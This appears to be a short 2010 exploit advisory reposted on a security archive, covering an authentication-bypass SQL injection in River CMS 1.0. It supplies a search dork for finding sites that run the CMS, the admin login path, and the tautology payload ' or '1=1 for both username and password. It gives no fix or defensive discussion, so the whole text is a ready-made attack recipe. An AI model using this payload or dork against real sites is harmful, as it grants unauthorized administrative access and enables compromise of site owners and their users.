Home / os / winme

River CMS version 1.0 SQL Injection / Authentication Bypass

Posted on 10 March 2010

========================================================================= River CMS version 1.0 SQL Injection / Authentication Bypass Vulnerability ========================================================================= ################################################################# # Application Info: # Name: River CMS # Version: 1.0 # Vendor: http://rivercms.ir ################################################################# # Vulnerability Info: # Type: Sql Injection # Risk: Medium # Dork: "Powered By River CMS" ################################################################# Vulnerability: http://site.ir/admin/ Username: ' or '1=1 Password:?' or '1=1 ################################################################# # ~ - [ [ : Inj3ct0r : ] ]

 

TOP